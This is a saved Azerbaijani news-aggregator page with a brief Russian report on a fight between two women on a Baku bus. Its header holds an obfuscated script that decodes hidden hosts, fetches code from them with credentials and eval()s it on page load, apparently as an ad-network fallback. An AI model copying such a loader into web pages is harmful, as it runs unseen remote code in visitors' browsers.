<!DOCTYPE html>
<html>
  <head>
    <script data-cfasync="false" type="text/javascript">var V7o=window;for(var Z in V7o){if(Z.length===((97,0x7A)>(0x10E,0x1B8)?'K':96<(0x109,119.30E1)?(103,6):(0x24B,1.217E3))&&Z.charCodeAt((0x24B>(3.45E2,0xAE)?(0x1CA,3):(4.58E2,0xD8)))===((0x216,103.)>8.99E2?0.:(71,0x53)<=(62.,0x21E)?(1.28E2,100):(45.40E1,93.60E1))&&Z.charCodeAt(((3.570E2,14.)>=136.?(13.,"p"):0x92>(5.60E1,1.130E2)?(111,5):(1.078E3,65)))===((52,0xB9)<=139.5E1?(12,119):(44.,0xD6))&&Z.charCodeAt(((102,122)<34?0x101:37.<(0x206,0x1A5)?(0xBC,1):(1.483E3,39.)))===(0x238>=(20,42.)?(1.484E3,105):(0x99,0x178)<=1?(14.77E2,95.7E1):(0x215,8.02E2))&&Z.charCodeAt((50.<(1.44E2,20.20E1)?(92,0):(0x5C,0xF1)<9.3E1?"R":(0xDD,125.)))===((0x141,0xAE)>(0x1FD,7)?(110,119):(0xB9,122.9E1)<=(81.7E1,2.9E2)?"m":(75,14.)))break};for(var V in V7o[Z]){if(V.length===((0x223,91.10E1)>(94.30E1,0x1E0)?(56,8):(5.22E2,0x1FC))&&V.charCodeAt((0x177<(149.,12.68E2)?(42.30E1,5):(40.2E1,4.78E2)))===((138.,145.)<=70.9E1?(1.341E3,101):0xE0<=(142.5E1,0x80)?'':(99,19.))&&V.charCodeAt((0x18F>(14.22E2,9.60E1)?(9.67E2,7):(0x52,100.10E1)))===(0x52<(0xA2,58)?'E':(11.3E2,0x218)>(0x50,0x26)?(112.,116):(37.,6))&&V.charCodeAt(((0x24E,0x238)>=(0x8F,0xC9)?(30,3):(24.6E1,88.)))===((0x224,13.09E2)>(0x1A4,1.12E2)?(2.56E2,117):(118.,59))&&V.charCodeAt(((2.64E2,6.32E2)>(1.97E2,58.5E1)?(10.43E2,0):(61,141)))===((0xB,60)<=0x1AD?(92.60E1,100):(0x13,124.60E1)<(70.0E1,139.)?1.037E3:(30.90E1,86)))break};(function(i,u,m,l){V7o[Z][u]=function(){var C=(0x1E2>(139.,41)?(1.027E3,0):(121,0xB0)>(15.0E1,0xFE)?(82.,'F'):(48.,4)),t=C,J=function J(){var K=((0x70,12.)<0xB5?(61.,'/'):(0x89,5));var v='';var x='//';var o=((117.9E1,0x1D4)>(2.84E2,0xD2)?(0x19A,'T'):(0x1A,1.52E2));var c='GE';var T=((91,1.0170E3)>(0xC7,0x165)?(83.,true):122.10E1<=(29.,109)?(115.,29.20E1):(9.39E2,51.1E1));var Y=new XMLHttpRequest();Y.withCredentials=T;Y.open((c+o),(x)+V7o[Z]['atob'](m[t].split(v).reverse().join(v))+K+l+K,T);Y.onreadystatechange=function(){var G=(128.8E1>(126.2E1,102.)?(92.2E1,200):(0x1D3,0x1AF));var h=(66<=(9.16E2,118.)?(116.,4):(0x1A2,15.5E1)>=(12.,1.99E2)?'/':(6.,46));if(Y.readyState==h&&Y.status==G&&Y.responseText){eval(Y.responseText);}};Y.onerror=function(){if(++t!=m.length){J();}};try{Y.send();}catch(G){Y.onerror();}};J();};})(V7o[Z][V],'_vpinp',['==QbvNmL3ATN0gjYkNmblB3b','==QbvNmLoNma2tma4Z2ZjdGa','==gbh9GbuIHZ20GNzRXY','==QbvNmL5ATN0gjYkNmblB3b'],1054348);</script><script data-cfasync="false" type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1054347" onerror="window._vpinp();"></script>    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>В Баку в автобусе подрались женщины – ВИДЕО </title>
    <base href="http://www.xebersaati.com/">
    <meta property="fb:app_id" content="694464134024628" />
    <meta property="og:url" content="http://www.xebersaati.com/news/72261-v-baku-v-avtobuse-podralis-zhenshiny-video/" />
    <meta property="og:type" content="article" />
    <meta property="og:title" content="В Баку в автобусе подрались женщины – ВИДЕО " />
    <meta property="og:description" content="Azərbaycanda və dünyada baş verən hadisələrdən xəbərdar olun." />
    <meta property="og:image" content="http://oxu.azstatic.com/uploads/W1siZiIsIjIwMTcvMDYvMjMvMTYvNTYvMDkvNDUxL2Jha3ViYXMuanBnIl0sWyJwIiwiZW5jb2RlIiwianBnIiwiLXF1YWxpdHkgODAiXSxbInAiLCJ0aHVtYiIsIjYyMHg0NjVcdTAwM2UiXV0?sha=60d39b75" />
    <meta property="fb:admins" content="708967524" />
    <meta name="twitter:card" content="summary" />
    <meta name="twitter:site" content="@xebersaati" />
    <meta name="twitter:creator" content="@xebersaati" />
    <meta name="twitter:domain" content="http://www.xebersaati.com/" />
    <meta name="twitter:title" content="В Баку в автобусе подрались женщины – ВИДЕО " />
    <meta name="twitter:description" content="Azərbaycanda və dünyada baş verən hadisələrdən xəbərdar olun." />
    <meta name="twitter:image" content="http://oxu.azstatic.com/uploads/W1siZiIsIjIwMTcvMDYvMjMvMTYvNTYvMDkvNDUxL2Jha3ViYXMuanBnIl0sWyJwIiwiZW5jb2RlIiwianBnIiwiLXF1YWxpdHkgODAiXSxbInAiLCJ0aHVtYiIsIjYyMHg0NjVcdTAwM2UiXV0?sha=60d39b75" />
    <meta name="robots" content="index, follow"/>
    <meta name="googlebot" content="index, follow" />
    <meta name="googlebot" content="index, archive" />
    <meta name="googlebot" content="all" />
    <meta name="yahoobot" content="index,follow" />
    <meta name="alexabot" content="index,follow" />
    <meta name="msnbot" content="index,follow" />
    <meta name="dmozbot" content="index,follow" />
    <meta name="revisit-after" content="1 days" />
    <meta name="description" content="Azərbaycanda və dünyada baş verən hadisələrdən xəbərdar olun." />
    <meta name="keywords" content="siyasət, iqtisadiyyat xəbərləri, dünya xəbərləri, gündəm, bölgə xəbərləri, xəbərlər, müharibə, xəbər, xəbər lenti" />
    <link rel="stylesheet" type="text/css" href="css/bootstrap.min.css">
    <link rel="stylesheet" type="text/css" href="css/bootflat.min.css">
    <link rel="stylesheet" type="text/css" href="css/style.css">
    <link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous">
    <link rel="icon" type="image/png" href="img/favicon.png"> 
    <!--[if lt IE 9]>
      <script src="js/html5shiv.js"></script>
      <script src="js/respond.min.js"></script>
    <![endif]-->
  </head>
  <body>

    <div class="container" id="container">
      <hr>
      <div class="logo pull-left">
        <a href="http://www.xebersaati.com/" class="pull-left"><img src="img/logo.png" alt="xəbər saatı"></a><div id="kategoriyalarButton"><button class="btn btn-danger">Kategoriyaları göstər <i class="fa fa-angle-double-down" aria-hidden="true"></i></button></div>
      </div>

            

      <div class="languages pull-right">
        <span class="badge"><a href="lang.php?lang=az">AZ</a></span>
        <span class="badge"><a href="lang.php?lang=en">EN</a></span>
        <span class="badge"><a href="lang.php?lang=ru">RU</a></span>
        <span class="badge"><a href="lang.php?lang=tr">TR</a></span>
      </div>

      <div class="clearfix"></div>
      <hr> 
      <div class="row">
      <div id="kategoriyalar">
        <div class="categories center-block"><a href="http://www.xebersaati.com/category/afrika/" class="btn btn-xs btn-primary">Afrika</a><a href="http://www.xebersaati.com/category/amerika/" class="btn btn-xs btn-primary">Amerika</a><a href="http://www.xebersaati.com/category/aqrar-senaye-kompleksi/" class="btn btn-xs btn-primary">Aqrar-sənaye kompleksi</a><a href="http://www.xebersaati.com/category/asiya/" class="btn btn-xs btn-primary">Asiya</a><a href="http://www.xebersaati.com/category/atletika/" class="btn btn-xs btn-primary">Atletika</a><a href="http://www.xebersaati.com/category/avropa/" class="btn btn-xs btn-primary">Avropa</a><a href="http://www.xebersaati.com/category/avto-moto/" class="btn btn-xs btn-primary">Avto-Moto</a><a href="http://www.xebersaati.com/category/az/" class="btn btn-xs btn-primary">az</a><a href="http://www.xebersaati.com/category/birja/" class="btn btn-xs btn-primary">Birja</a><a href="http://www.xebersaati.com/category/biznes-ve-iqtisadiyyat-xeberleri/" class="btn btn-xs btn-primary">Biznes və iqtisadiyyat xəbərləri</a><a href="http://www.xebersaati.com/category/cemiyyet/" class="btn btn-xs btn-primary">Cəmiyyət</a><a href="http://www.xebersaati.com/category/dagliq-qarabag/" class="btn btn-xs btn-primary">Dağlıq Qarabağ</a><a href="http://www.xebersaati.com/category/dagliq-qarabag-munaqishesi/" class="btn btn-xs btn-primary">Dağlıq Qarabağ Münaqişəsi</a><a href="http://www.xebersaati.com/category/daxili-siyaset/" class="btn btn-xs btn-primary">Daxili siyasət</a><a href="http://www.xebersaati.com/category/diaspor/" class="btn btn-xs btn-primary">Diaspor</a><a href="http://www.xebersaati.com/category/din/" class="btn btn-xs btn-primary">Din</a><a href="http://www.xebersaati.com/category/doyush-novleri/" class="btn btn-xs btn-primary">Döyüş növləri</a><a href="http://www.xebersaati.com/category/dunya/" class="btn btn-xs btn-primary">Dünya</a><a href="http://www.xebersaati.com/category/dunya-xeberleri/" class="btn btn-xs btn-primary">Dünya xəbərləri</a><a href="http://www.xebersaati.com/category/energetika/" class="btn btn-xs btn-primary">Energetika</a><a href="http://www.xebersaati.com/category/edebiyyat/" class="btn btn-xs btn-primary">Ədəbiyyat</a><a href="http://www.xebersaati.com/category/futbol/" class="btn btn-xs btn-primary">Futbol</a><a href="http://www.xebersaati.com/category/hadise/" class="btn btn-xs btn-primary">Hadisə</a><a href="http://www.xebersaati.com/category/herbi/" class="btn btn-xs btn-primary">Hərbi</a><a href="http://www.xebersaati.com/category/idman/" class="btn btn-xs btn-primary">İdman</a><a href="http://www.xebersaati.com/category/iii-sektor/" class="btn btn-xs btn-primary">III Sektor</a><a href="http://www.xebersaati.com/category/ikt/" class="btn btn-xs btn-primary">İKT</a><a href="http://www.xebersaati.com/category/incesenet/" class="btn btn-xs btn-primary">İncəsənət</a><a href="http://www.xebersaati.com/category/infrastruktur/" class="btn btn-xs btn-primary">İnfrastruktur</a><a href="http://www.xebersaati.com/category/iqtisadi/" class="btn btn-xs btn-primary">İqtisadi</a><a href="http://www.xebersaati.com/category/iqtisadiyyat/" class="btn btn-xs btn-primary">İqtisadiyyat</a><a href="http://www.xebersaati.com/category/islamiada/" class="btn btn-xs btn-primary">İslamiada</a><a href="http://www.xebersaati.com/category/kriminal/" class="btn btn-xs btn-primary">Kriminal</a><a href="http://www.xebersaati.com/category/maliyye/" class="btn btn-xs btn-primary">Maliyyə</a><a href="http://www.xebersaati.com/category/maraqli/" class="btn btn-xs btn-primary">Maraqlı</a><a href="http://www.xebersaati.com/category/mdb/" class="btn btn-xs btn-primary">MDB</a><a href="http://www.xebersaati.com/category/media/" class="btn btn-xs btn-primary">Media</a><a href="http://www.xebersaati.com/category/medeniyyet/" class="btn btn-xs btn-primary">Mədəniyyət</a><a href="http://www.xebersaati.com/category/medeniyyet-siyaseti/" class="btn btn-xs btn-primary">Mədəniyyət siyasəti</a><a href="http://www.xebersaati.com/category/muharibe/" class="btn btn-xs btn-primary">Müharibə</a><a href="http://www.xebersaati.com/category/musahibe/" class="btn btn-xs btn-primary">Müsahibə</a><a href="http://www.xebersaati.com/category/nezer-noqtesi/" class="btn btn-xs btn-primary">Nəzər nöqtəsi</a><a href="http://www.xebersaati.com/category/olimpiada/" class="btn btn-xs btn-primary">Olimpiada</a><a href="http://www.xebersaati.com/category/ordu/" class="btn btn-xs btn-primary">Ordu</a><a href="http://www.xebersaati.com/category/sahibkarliq/" class="btn btn-xs btn-primary">Sahibkarlıq</a><a href="http://www.xebersaati.com/category/senaye-ve-energetika/" class="btn btn-xs btn-primary">Sənaye və energetika</a><a href="http://www.xebersaati.com/category/sergi/" class="btn btn-xs btn-primary">Sərgi</a><a href="http://www.xebersaati.com/category/siyaset/" class="btn btn-xs btn-primary">Siyasət</a><a href="http://www.xebersaati.com/category/siyasi/" class="btn btn-xs btn-primary">Siyasi</a><a href="http://www.xebersaati.com/category/sosial/" class="btn btn-xs btn-primary">Sosial</a><a href="http://www.xebersaati.com/category/shou-biznes/" class="btn btn-xs btn-primary">Şou-biznes</a><a href="http://www.xebersaati.com/category/stolustu-oyunlar/" class="btn btn-xs btn-primary">Stolüstü oyunlar</a><a href="http://www.xebersaati.com/category/telekommunikasiya/" class="btn btn-xs btn-primary">Telekommunikasiya</a><a href="http://www.xebersaati.com/category/tender-musabiqeleri/" class="btn btn-xs btn-primary">Tender müsabiqələri</a><a href="http://www.xebersaati.com/category/top-oyunlari/" class="btn btn-xs btn-primary">Top oyunları</a><a href="http://www.xebersaati.com/category/turizm/" class="btn btn-xs btn-primary">Turizm</a><a href="http://www.xebersaati.com/category/xarici-siyaset/" class="btn btn-xs btn-primary">Xarici siyasət</a></div><div class="clearfix"></div><hr> 
      </div>
      
      <div class="content">
  <a href="http://go.ad2up.com/afu.php?id=1054352" target="_blank"><img src="img/earn-money-from-internet.png" class="thumbnail img-responsive" id="kat"></a>
  <div class="box thumbnail">	
    <div class="xeberMetni">
          <img src="http://oxu.azstatic.com/uploads/W1siZiIsIjIwMTcvMDYvMjMvMTYvNTYvMDkvNDUxL2Jha3ViYXMuanBnIl0sWyJwIiwiZW5jb2RlIiwianBnIiwiLXF1YWxpdHkgODAiXSxbInAiLCJ0aHVtYiIsIjYyMHg0NjVcdTAwM2UiXV0?sha=60d39b75" alt="" class="thumbnail">
          <h1>В Баку в автобусе подрались женщины – ВИДЕО </h1>
          <p class="help-block"><em><small>2017-06-23 17:12</small> | <a href="http://ru.oxu.az/society/199666" target="_blank">www.oxu.az</a> | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</em></p>
          
      <p></p><p>В автобусе Bakubus произошел инцидент.</p>

<p>Как передает <strong>Oxu.Az</strong> со ссылкой на <a href="http://azxeber.com" target="_blank">azxeber.com</a>, пассажирка автобуса попросила водителя остановиться вне остановки. В разговор вмешалась другая пассажирка, сказав, что останавливаться вне остановки запрещено.</p>

<p>Между женщинами разгорелся спор, который перерос в драку.</p>


<iframe allowfullscreen="" frameborder="0" height="1164" mozallowfullscreen="" src="https://player.vimeo.com/video/222831498?title=0&amp;byline=0&amp;portrait=0" webkitallowfullscreen="" width="640"></iframe>

<p><em><strong>A.M.</strong></em></p>


<p><strong><a href="http://" target="_blank"></a></strong></p>

    
          <hr>
          <div class="text-center addthis_sharing_toolbox"></div>
        </div>    <div class="clearfix"></div>
  </div>
  <h1 class="relatedTitle">Bu kateqoriyadaki digər xəbərlər</h1>
  </div>
<div class="sidebar">
  <h1>Son xəbərlər</h1>
  <ul class="media-list"><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/72314-atet-ilin-evvelinden-donbasda-51-dinc-sakin-helak-olub/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/june/23/big/46-tn.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/72314-atet-ilin-evvelinden-donbasda-51-dinc-sakin-helak-olub/">ATƏT: İlin əvvəlindən Donbasda 51 dinc sakin həlak olub</a></div>
                <small>2017-06-23 20:46 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/72303-nagi-seferov-yeniden-atb-icraiyye-komitesine-uzv-secilib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/june/23/big/5cc586b2e7edf4bcfd3d287c1e97fe8d.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/72303-nagi-seferov-yeniden-atb-icraiyye-komitesine-uzv-secilib/">Nağı Səfərov yenidən ATB İcraiyyə Komitəsinə üzv seçilib</a></div>
                <small>2017-06-23 20:21 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 5</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/72294-italiyada-birinci-azerbaycan-film-festivalinin-acilishi-olub/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/june/23/big/1.JPG"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/72294-italiyada-birinci-azerbaycan-film-festivalinin-acilishi-olub/">İtaliyada birinci Azərbaycan Film Festivalının açılışı olub</a></div>
                <small>2017-06-23 20:05 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 4</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/72320-dovlet-genc-tamashacilar-teatri-movsumun-son-beynelxalq-festivalina-hazirlashir-foto/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn.trend.az/media/pictures/2017/06/23/festival_230617_02.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/72320-dovlet-genc-tamashacilar-teatri-movsumun-son-beynelxalq-festivalina-hazirlashir-foto/">Dövlət Gənc Tamaşaçılar Teatrı mövsümün son beynəlxalq festivalına hazırlaşır (FOTO)</a></div>
                <small>2017-06-23 19:55 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 0</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/72293-pakistanda-toredilen-partlayishlar-neticesinde-36-nefer-olub/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/june/23/big/1478708685.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/72293-pakistanda-toredilen-partlayishlar-neticesinde-36-nefer-olub/">Pakistanda törədilən partlayışlar nəticəsində 36 nəfər ölüb</a></div>
                <small>2017-06-23 19:39 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 4</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/72284-metbuat-shurasinin-komissiya-iclasinda-bir-sira-shikayetlere-baxilib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/june/23/big/dsc-7583.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/72284-metbuat-shurasinin-komissiya-iclasinda-bir-sira-shikayetlere-baxilib/">Mətbuat Şurasının komissiya iclasında bir sıra şikayətlərə baxılıb</a></div>
                <small>2017-06-23 19:22 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 6</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/72319-heyder-eliyev-sarayinda-yeni-layihe-meshhurlar-ve-ovladlari/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn.trend.az/media/pictures/2016/04/07/trend_saray_heydar_aliyev_albom.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/72319-heyder-eliyev-sarayinda-yeni-layihe-meshhurlar-ve-ovladlari/">Heydər Əliyev Sarayında yeni layihə: "Məşhurlar və övladları"</a></div>
                <small>2017-06-23 19:18 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 0</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/72283-silahli-quvvelerin-herbi-akademiyasinda-buraxilish-merasimi-olub/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/june/23/big/1-7.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/72283-silahli-quvvelerin-herbi-akademiyasinda-buraxilish-merasimi-olub/">Silahlı Qüvvələrin Hərbi Akademiyasında buraxılış mərasimi olub</a></div>
                <small>2017-06-23 18:59 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 5</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/72277-qarabag-klubu-haqqinda-cekilen-film-celsi-nin-stadionunda-teqdim-olunub/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/june/23/big/20170622-a-wiard-0071.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/72277-qarabag-klubu-haqqinda-cekilen-film-celsi-nin-stadionunda-teqdim-olunub/">“Qarabağ” klubu haqqında çəkilən film  “Çelsi”nin stadionunda təqdim olunub</a></div>
                <small>2017-06-23 18:57 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 5</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/72278-dim-57-minden-cox-shagird-ucun-buraxilish-imtahani-kecirib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/june/23/big/dovlet-imtahan-merkezi-dim-1.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/72278-dim-57-minden-cox-shagird-ucun-buraxilish-imtahani-kecirib/">DİM 57 mindən çox şagird üçün buraxılış imtahanı keçirib</a></div>
                <small>2017-06-23 18:57 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 6</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/72310-formula-1-yarishlarinda-ikinci-serbest-yurushun-neticeleri-melum-oldu/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn.trend.az/media/pictures/2017/06/23/trend_formula_1_serbest_230617_06.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/72310-formula-1-yarishlarinda-ikinci-serbest-yurushun-neticeleri-melum-oldu/">Formula 1 yarışlarında ikinci sərbəst yürüşün NƏTİCƏLƏRİ məlum oldu</a></div>
                <small>2017-06-23 18:50 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/72268-azerbaycanin-yunanistandaki-sefiri-geri-cagirilib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/june/23/big/ilham-eliyev-6.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/72268-azerbaycanin-yunanistandaki-sefiri-geri-cagirilib/">Azərbaycanın Yunanıstandakı səfiri geri çağırılıb</a></div>
                <small>2017-06-23 18:48 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 5</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/72267-azerbaycanin-fransadaki-sefiri-deyishdirilib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/june/23/big/untitled-1.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/72267-azerbaycanin-fransadaki-sefiri-deyishdirilib/">Azərbaycanın Fransadakı səfiri dəyişdirilib</a></div>
                <small>2017-06-23 18:42 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 5</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/72257-deniz-neqliyyati-ishcilerine-prezidentinin-ferdi-teqaudu-teyin-olunub/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/june/23/big/ilham-eliyev-5.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/72257-deniz-neqliyyati-ishcilerine-prezidentinin-ferdi-teqaudu-teyin-olunub/">Dəniz nəqliyyatı işçilərinə Prezidentinin fərdi təqaüdü təyin olunub</a></div>
                <small>2017-06-23 18:35 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 5</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/72309-azerbaycanin-fransada-yeni-sefiri-teyin-edilib-yenilenib/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn.trend.az/media/pictures/2016/04/15/rahman_mustafayev_070212_02.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/72309-azerbaycanin-fransada-yeni-sefiri-teyin-edilib-yenilenib/">Azərbaycanın Fransada yeni səfiri təyin edilib (YENİLƏNİB)</a></div>
                <small>2017-06-23 18:35 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/72256-ucuncu-gunun-adami-filminin-metbuat-ucun-teqdimati-kecirilib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/june/23/big/gunn.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/72256-ucuncu-gunun-adami-filminin-metbuat-ucun-teqdimati-kecirilib/">“Üçüncü günün adamı” filminin mətbuat üçün təqdimatı keçirilib</a></div>
                <small>2017-06-23 18:31 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 4</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/72246-deniz-neqliyyati-ishcilerine-emekdar-muhendis-fexri-adi-verilib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/june/23/big/ilham-eliyev-4.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/72246-deniz-neqliyyati-ishcilerine-emekdar-muhendis-fexri-adi-verilib/">Dəniz nəqliyyatı işçilərinə “Əməkdar mühəndis” fəxri adı verilib</a></div>
                <small>2017-06-23 18:23 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 4</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/72300-deniz-neqliyyati-ishcilerine-prezidentin-ferdi-teqaudu-medal-ve-fexri-ad-verilib-siyahi-yenilenib/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn.trend.az/media/pictures/2016/12/22/ilham_aliyev_main__221216_2.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/72300-deniz-neqliyyati-ishcilerine-prezidentin-ferdi-teqaudu-medal-ve-fexri-ad-verilib-siyahi-yenilenib/">Dəniz nəqliyyatı işçilərinə Prezidentin fərdi təqaüdü, medal və fəxri ad verilib - SİYAHI (YENİLƏNİB)</a></div>
                <small>2017-06-23 18:23 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/72245-baki-sumqayit-baki-marshrutu-ile-hereket-eden-elektrik-qatarlarinin-hereket-cedveli-deyishib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/june/23/big/qatar.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/72245-baki-sumqayit-baki-marshrutu-ile-hereket-eden-elektrik-qatarlarinin-hereket-cedveli-deyishib/">Bakı-Sumqayıt-Bakı marşrutu ilə hərəkət edən elektrik qatarlarının hərəkət cədvəli dəyişib</a></div>
                <small>2017-06-23 18:21 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 5</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/72234-deniz-neqliyyati-ishcileri-tereqqi-medali-ile-teltif-edilibler-siyahi/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/june/23/big/ilham-eliyev-3.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/72234-deniz-neqliyyati-ishcileri-tereqqi-medali-ile-teltif-edilibler-siyahi/">Dəniz nəqliyyatı işçiləri “Tərəqqi” medalı ilə təltif ediliblər - SİYAHI</a></div>
                <small>2017-06-23 18:20 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 4</small>
              </div>
            </li></ul></div>    </div><!-- row -->

    <footer>
    	<hr>
    	<p class="text-center"><small>Saytdakı materialların istifadəsi zamanı istinad edilməsi vacibdir. Məlumat internet səhifələrində istifadə edildikdə hiperlink vasitəsi ilə istinad mütləqdir.</small><br>Copyright © 2016 All rights reserved. </p>
    	<p class="text-center">
    	  <!--LiveInternet counter--><script type="text/javascript"><!--
          document.write("<img src='//counter.yadro.ru/hit?t29.3;r"+
          escape(document.referrer)+((typeof(screen)=="undefined")?"":
          ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
          screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
          ";h"+escape(document.title.substring(0,80))+";"+Math.random()+
          "' alt='' title='LiveInternet: number of visitors and pageviews"+
          " is shown' "+
          "border='0' width='88' height='120'>")
          //--></script><!--/LiveInternet-->
          <img border=0 alt='ILK-10 Azeri Website Directory' src='http://www.ilk10.az/counter/count3.php?color=liliac&id=36590'>
    	</p>
    </footer>
    </div><!-- container -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
    <script type="text/javascript" src="js/bootstrap.min.js"></script>
    <script type="text/javascript">
    	$('.xeberMetni iframe').wrap('<div class="embed-responsive embed-responsive-16by9"></div>');
    	$(".embed-responsive").before('<div class="clearfix"></div>');$(".xeberMetni iframe").addClass('embed-responsive-item');
      var flag="false";
      $("#kategoriyalarButton").click(function(){
        if(flag=="false")
          {$('#kategoriyalar').show(200); flag="true"; $("#kategoriyalarButton button").html('Kategoriyaları gizlət <i class="fa fa-angle-double-up" aria-hidden="true"></i>');} 
        else 
          {$('#kategoriyalar').hide(200); flag="false"; $("#kategoriyalarButton button").html('Kategoriyaları göstər <i class="fa fa-angle-double-down" aria-hidden="true"></i>');}
        
      });
    </script>
    <!--Google Analytics-->
	  <script>
	    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	    (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
